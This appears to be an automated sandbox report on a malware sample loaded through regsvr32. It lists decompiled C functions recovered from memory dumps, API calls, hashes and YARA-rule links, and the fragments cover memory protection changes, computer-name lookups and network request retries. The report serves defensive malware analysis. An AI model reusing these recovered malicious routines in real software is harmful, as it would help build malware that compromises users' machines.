                • Opcode ID: 0ffc0683f26a2b57b43b8746348ac33f08a036540ffff5f3020c60954ef36792
                • Instruction ID: 6745e8beaf9ccdfdeb43f11ec8cef7deec884732d1a267603443c15db412a025
                • Opcode Fuzzy Hash: 0ffc0683f26a2b57b43b8746348ac33f08a036540ffff5f3020c60954ef36792
                • Instruction Fuzzy Hash: B2315171D00219EFEB21DFA6E8809AEBBBCEB84750F1440ABE514AB141D7B56E41CB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F3318 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                Download Yara Rule
                C-Code - Quality: 50%
                			E031F3318(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x31fa2d8; // 0x240d5a8
				_t2 = _t42 + 0x31fb46c; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x31fa2d8; // 0x240d5a8
					_t6 = _t45 + 0x31fb48c; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x31fa2d8; // 0x240d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x31fb47c; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                0x031f3324
                0x031f3325
                0x031f332b
                0x031f3332
                0x031f3334
                0x031f3338
                0x031f333c
                0x031f333e
                0x031f3347
                0x031f334d
                0x031f3355
                0x031f3357
                0x031f335b
                0x031f335d
                0x031f336a
                0x031f336e
                0x031f3373
                0x031f3379
                0x031f337e
                0x031f3386
                0x031f3388
                0x031f338a
                0x031f3390
                0x031f3390
                0x031f3393
                0x031f3399
                0x031f3399
                0x031f339c
                0x031f33a2
                0x031f33a2
                0x031f33a9

                APIs
                • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 031F3355
                • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 031F3386
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Interface_ProxyQueryUnknown_
                • String ID:
                • API String ID: 2522245112-0
                • Opcode ID: 46b229c2d817e457e1c994d3ceb6632fdcfe5f65865e821f2947dbeb8d67e34b
                • Instruction ID: bb062ae41413d14eb13b14e8e32bd526e36c32d2ef49583ae860df736c5db1b6
                • Opcode Fuzzy Hash: 46b229c2d817e457e1c994d3ceb6632fdcfe5f65865e821f2947dbeb8d67e34b
                • Instruction Fuzzy Hash: 13212E79A00619EFCB00DBA4C458D5AB779FF8C714B148684E906DB325DB31ED45CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCEF8C Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,016595A8,00000003,00000000,00000000), ref: 04BCEFBC
                • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,016595A8,00000003,00000000), ref: 04BCF003
                  • Part of subcall function 04BC57E0: RtlFreeHeap.NTDLL(00000000,?,04BC222D,?,?,?,?,?,?,?,?,04BC1089,?,?,?), ref: 04BC57EC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                • String ID:
                • API String ID: 552344955-0
                • Opcode ID: f61585e966b646342ba321ba4e626003547e832fef0f1c7a60355618ef38f154
                • Instruction ID: 3d3031a2ed15b2b83e1a2b99bea83992e325472c7b871a5465e60fe566cf4939
                • Opcode Fuzzy Hash: f61585e966b646342ba321ba4e626003547e832fef0f1c7a60355618ef38f154
                • Instruction Fuzzy Hash: 18116975900208FBDB219FA9D8C4BAEB7B9EF90755F1040DDE50497240D7B4EA41DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC9677 Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                Download Yara Rule
                APIs
                • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,04BD4776,69B25F44,?,?,00000000), ref: 04BC96B4
                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04BD4776), ref: 04BC9715
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Time$FileFreeHeapSystem
                • String ID:
                • API String ID: 892271797-0
                • Opcode ID: 07ee9dfdcb20d46c3964794dfc95e98d790223574e60389bcd618969c39fdc88
                • Instruction ID: ac917a96f39f0d84a2cc346dd153803e458ff203a9f668b1c55817c19f2bd90d
                • Opcode Fuzzy Hash: 07ee9dfdcb20d46c3964794dfc95e98d790223574e60389bcd618969c39fdc88
                • Instruction Fuzzy Hash: C6110AB6900209EBEF01EFA1D984A9EB7BCEB48705F0004A6E505E7145E778EB44DF61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F5760 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                Download Yara Rule
                APIs
                • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 031F5788
                  • Part of subcall function 031F51C7: SysFreeString.OLEAUT32(?), ref: 031F52A6
                • SafeArrayDestroy.OLEAUT32(?), ref: 031F57D5
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ArraySafe$CreateDestroyFreeString
                • String ID:
                • API String ID: 3098518882-0
                • Opcode ID: 369cd838ab7dbf39fc10779bf1b9770ef87b5eae36844044ef14f0158e34b1db
                • Instruction ID: 48fa6039dd389c7f7d6f9e44374211bf3bd5770a332b5e42c65a7553d8708fe7
                • Opcode Fuzzy Hash: 369cd838ab7dbf39fc10779bf1b9770ef87b5eae36844044ef14f0158e34b1db
                • Instruction Fuzzy Hash: 6A115276A00609BFDB04EF94C844EEEBBB9EF0C350F058115FA04E6160D7759A55DFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F7178 Relevance: 3.0, APIs: 2, Instructions: 42memoryCOMMON
                Download Yara Rule
                APIs
                • SysAllocString.OLEAUT32(031F19CD), ref: 031F7192
                  • Part of subcall function 031F51C7: SysFreeString.OLEAUT32(?), ref: 031F52A6
                • SysFreeString.OLEAUT32(00000000), ref: 031F71D2
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: d93b831f925b17cf475bf3e1dcae36285f5a012836b66ef90674e1c3a2024931
                • Instruction ID: 8fd7c75f9843e5a39a0bd29cedbeff497a60ef8fa764c04fa620a3a07a977b52
                • Opcode Fuzzy Hash: d93b831f925b17cf475bf3e1dcae36285f5a012836b66ef90674e1c3a2024931
                • Instruction Fuzzy Hash: DD014B7650061ABFCB11EF68D808D9FBBB9FF4C350B014122EE05E6120E770AA198BA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F71E5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 42memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F71E5(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E031F55E9(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x31fa290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E031F167E(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                0x031f71e5
                0x031f71ed
                0x031f7204
                0x031f721f
                0x031f7223
                0x031f7228
                0x031f722a
                0x031f723a
                0x031f7246
                0x031f722c
                0x031f722c
                0x031f722f
                0x031f7234
                0x031f7234
                0x031f722a
                0x031f724c
                0x031f7250
                0x031f7250
                0x031f71f9
                0x031f71fe
                0x031f7202
                0x00000000
                0x00000000
                0x00000000

                APIs
                  • Part of subcall function 031F167E: SysFreeString.OLEAUT32(00000000), ref: 031F16E4
                • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,031F5D33,?,004F0053,056093E0,00000000,?), ref: 031F7246
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Free$HeapString
                • String ID: Ut
                • API String ID: 3806048269-8415677
                • Opcode ID: 1a57416f9a683c3abd67a230a1deeeacdf6074c0bd1e7d9c7258dbbbdfe029f9
                • Instruction ID: f85f928ef1289845b5b51b9224cf00a5a6e61e44f46e6ac39c659567ac494de4
                • Opcode Fuzzy Hash: 1a57416f9a683c3abd67a230a1deeeacdf6074c0bd1e7d9c7258dbbbdfe029f9
                • Instruction Fuzzy Hash: F201E832100219BFCB229F88DC01FEA7B69FB0C790F088025FE099A161D731D9A0DB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F4A14 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                Download Yara Rule
                C-Code - Quality: 37%
                			E031F4A14(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E031F2114(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E031F2C11(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                0x031f4a19
                0x031f4a24
                0x031f4a26
                0x031f4a2c
                0x031f4a2e
                0x031f4a33
                0x031f4a3c
                0x031f4a40
                0x031f4a49
                0x031f4a4d
                0x031f4a5c
                0x031f4a4f
                0x031f4a50
                0x031f4a55
                0x031f4a55
                0x031f4a4d
                0x031f4a40
                0x031f4a65

                APIs
                • GetComputerNameExA.KERNELBASE(00000003,00000000,?,?,00000000,?,?,031F7553), ref: 031F4A2C
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • GetComputerNameExA.KERNELBASE(00000003,00000000,?,?,?,?,031F7553), ref: 031F4A49
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ComputerHeapName$AllocateFree
                • String ID:
                • API String ID: 187446995-0
                • Opcode ID: 39315e60b4e66d35957a4076a27d148ecfcc101ccc25c20aff5f214f19b15b27
                • Instruction ID: cda01543f8e3c75d0ce0b2d674ac39b0461c1ff4c2f222e1becd7387ab27339c
                • Opcode Fuzzy Hash: 39315e60b4e66d35957a4076a27d148ecfcc101ccc25c20aff5f214f19b15b27
                • Instruction Fuzzy Hash: 8DF0B47A604209BFEB10D69ADC01FAF77ECDBC9A00F250155AA02D7100EB70DB0297B0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F5E26 Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F5E26(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E031F2114(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x31fa2d8; // 0x240d5a8
					_t5 = _t11 + 0x31fba50; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x31fa2d8; // 0x240d5a8
					_t6 = _t14 + 0x31fb8fc; // 0x6d0063
					_t16 = E031F6096(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E031F2C11(_t20);
				}
				return _t18;
			}









                0x031f5e3c
                0x031f5e40
                0x031f5e80
                0x031f5e42
                0x031f5e46
                0x031f5e4d
                0x031f5e55
                0x031f5e5b
                0x031f5e66
                0x031f5e6f
                0x031f5e75
                0x031f5e77
                0x031f5e77
                0x031f5e85

                APIs
                • lstrlenW.KERNEL32(74E5F710,00000000,?,031F61EA,00000000,?,74E5F710,00000000,74E5F730), ref: 031F5E2C
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • wsprintfW.USER32 ref: 031F5E55
                  • Part of subcall function 031F6096: memset.NTDLL ref: 031F60B9
                  • Part of subcall function 031F6096: GetLastError.KERNEL32 ref: 031F6105
                  • Part of subcall function 031F2C11: RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                • String ID:
                • API String ID: 1672627171-0
                • Opcode ID: 929b08079b3d143c101e46c136e77269543b0759046c328407c9802f92988a5e
                • Instruction ID: b1515510e3469d1f5a11d044c7cd7176eb34b00d67e996ae84296d968adb5c8d
                • Opcode Fuzzy Hash: 929b08079b3d143c101e46c136e77269543b0759046c328407c9802f92988a5e
                • Instruction Fuzzy Hash: 8CF090366042146FC624EB64EC08E5B779DEF8D710F168511FB04CB215C735E5A28BB5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD8E5E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                Download Yara Rule
                APIs
                • RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD8E68
                • RtlLeaveCriticalSection.NTDLL(04BEE480), ref: 04BD8EA4
                  • Part of subcall function 04BE0B4D: lstrlen.KERNEL32(?,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6,04BDCCD7,04BC159F,04BC158F), ref: 04BE0B9A
                  • Part of subcall function 04BE0B4D: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0BAC
                  • Part of subcall function 04BE0B4D: lstrcpy.KERNEL32(00000000,?), ref: 04BE0BBB
                  • Part of subcall function 04BE0B4D: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,04BCB5BA,04BED4E4,04BC159F,04BC158F,00000004,00000000,?,00000000,04BE48E6), ref: 04BE0BCC
                  • Part of subcall function 04BC57E0: RtlFreeHeap.NTDLL(00000000,?,04BC222D,?,?,?,?,?,?,?,?,04BC1089,?,?,?), ref: 04BC57EC
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                • String ID:
                • API String ID: 1872894792-0
                • Opcode ID: 92145aec265f243b689e5ca2181d5f8cacbabafcbce4329f185d050fef321fce
                • Instruction ID: 6f2f24ddb10e5f593f84b1c3819b7ef06f3a5a3cc7258b1f104f399c1dca5163
                • Opcode Fuzzy Hash: 92145aec265f243b689e5ca2181d5f8cacbabafcbce4329f185d050fef321fce
                • Instruction Fuzzy Hash: C2F0E5762012259FA7207F6ED88483AF7B8EBC921970542CBE95567310CBB6BC00CAF0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BD6FB0 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • InterlockedIncrement.KERNEL32(04BEE0DC), ref: 04BD6FC5
                  • Part of subcall function 04BCAFD1: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BCAFFC
                  • Part of subcall function 04BCAFD1: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 04BCB009
                  • Part of subcall function 04BCAFD1: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04BCB095
                  • Part of subcall function 04BCAFD1: GetModuleHandleA.KERNEL32(00000000), ref: 04BCB0A0
                  • Part of subcall function 04BCAFD1: RtlImageNtHeader.NTDLL(00000000), ref: 04BCB0A9
                  • Part of subcall function 04BCAFD1: RtlExitUserThread.NTDLL(00000000), ref: 04BCB0BE
                • InterlockedDecrement.KERNEL32(04BEE0DC), ref: 04BD6FE9
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                • String ID:
                • API String ID: 1011034841-0
                • Opcode ID: 01571c9f093316eeefc152b6fc6a8898bd1c0ea86f29610ca8692d1df49f31c6
                • Instruction ID: fae5023b3584592adb05593ce9a50f4de1784fbc29c5c96d562f967700256d8d
                • Opcode Fuzzy Hash: 01571c9f093316eeefc152b6fc6a8898bd1c0ea86f29610ca8692d1df49f31c6
                • Instruction Fuzzy Hash: 7BE0D8313C9922D7CB656F759C44B2AB760EB90741F0048F8F570D2090E720F844CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F6D32 Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F6D32(signed int __edx, void* __edi, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t8;
				void* _t9;
				void* _t10;
				signed int _t11;

				_t11 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x31fa290 = _t3;
				if(_t3 == 0) {
					_t9 = 8;
					return _t9;
				}
				 *0x31fa180 = GetTickCount();
				_t5 = E031F500B(_a4);
				if(_t5 == 0) {
					E031F2F14(_t10, __edi, _a4); // executed
					if(E031F17FF(_t10) != 0) {
						 *0x31fa2b8 = 1; // executed
					}
					_t8 = E031F34A2(_t11); // executed
					return _t8;
				}
				return _t5;
			}









                0x031f6d32
                0x031f6d3b
                0x031f6d43
                0x031f6d48
                0x031f6d4c
                0x00000000
                0x031f6d4c
                0x031f6d59
                0x031f6d5e
                0x031f6d65
                0x031f6d6b
                0x031f6d77
                0x031f6d79
                0x031f6d79
                0x031f6d83
                0x00000000
                0x031f6d83
                0x031f6d88

                APIs
                • HeapCreate.KERNELBASE(00000000,00400000,00000000,031F1B56,?), ref: 031F6D3B
                • GetTickCount.KERNEL32 ref: 031F6D4F
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: CountCreateHeapTick
                • String ID:
                • API String ID: 2177101570-0
                • Opcode ID: d06ee571076a162d5dc893a3ca68c6585c5f08ebdf04f643824037c3e31a21ca
                • Instruction ID: f0505bd347bdca5f5e7b4e41efadbee7f09c49926527159d2175d94976b19cc4
                • Opcode Fuzzy Hash: d06ee571076a162d5dc893a3ca68c6585c5f08ebdf04f643824037c3e31a21ca
                • Instruction Fuzzy Hash: 20E0DF78248300AFEB28FFB09C0970A36A8FF4CB40F144824E78DE9084EB74C080AA31
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC9527 Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BD4428: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 04BD4461
                  • Part of subcall function 04BD4428: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 04BD4497
                  • Part of subcall function 04BD4428: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 04BD44A3
                  • Part of subcall function 04BD4428: lstrcmpi.KERNEL32(?,00000000), ref: 04BD44E0
                  • Part of subcall function 04BD4428: StrChrA.SHLWAPI(?,0000002E), ref: 04BD44E9
                  • Part of subcall function 04BD4428: lstrcmpi.KERNEL32(?,00000000), ref: 04BD44FB
                  • Part of subcall function 04BD4428: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 04BD454C
                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,00000010,?,?,?,04BEA5C0,0000002C,04BC5FC8,06248E36,?,00000000,04BC3B4C), ref: 04BC9566
                  • Part of subcall function 04BCB45A: GetProcAddress.KERNEL32(?,00000000), ref: 04BCB483
                  • Part of subcall function 04BCB45A: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BCE55E,00000000,00000000,00000028,00000100), ref: 04BCB4A5
                • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,04BEA5C0,0000002C,04BC5FC8,06248E36,?,00000000,04BC3B4C,?,00000318), ref: 04BC95F1
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                • String ID:
                • API String ID: 4138075514-0
                • Opcode ID: 7fe229138f21d47e82639f72a72454fce7f16934dc6a22ae22ea54bbd460c4e8
                • Instruction ID: c03038dcd257d21c9e420e1d1590880975f51b4cd383c5a0341045f817ee5407
                • Opcode Fuzzy Hash: 7fe229138f21d47e82639f72a72454fce7f16934dc6a22ae22ea54bbd460c4e8
                • Instruction Fuzzy Hash: 09210271D01229ABDF519FA5DC80ADEBFB4FF48724F10816AE914B6250D334AA41CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F4EFA Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                Download Yara Rule
                C-Code - Quality: 32%
                			E031F4EFA(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x6f99e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                0x031f4f01
                0x031f4f0e
                0x031f4f10
                0x031f4f13
                0x031f4f58
                0x031f4f60
                0x031f4f66
                0x031f4f6a
                0x00000000
                0x00000000
                0x031f4f17
                0x031f4f22
                0x031f4f25
                0x031f4f56
                0x00000000
                0x00000000
                0x031f4f27
                0x031f4f2a
                0x031f4f31
                0x031f4f35
                0x031f4f3e
                0x031f4f46
                0x031f4f74
                0x031f4f48
                0x031f4f48
                0x00000000
                0x031f4f48
                0x031f4f46
                0x031f4f31
                0x031f4f77
                0x031f4f7e
                0x031f4f7e
                0x00000000

                APIs
                • GetLastError.KERNEL32 ref: 031F4F17
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,031F76DB,00000000,?,?), ref: 031F4F6E
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
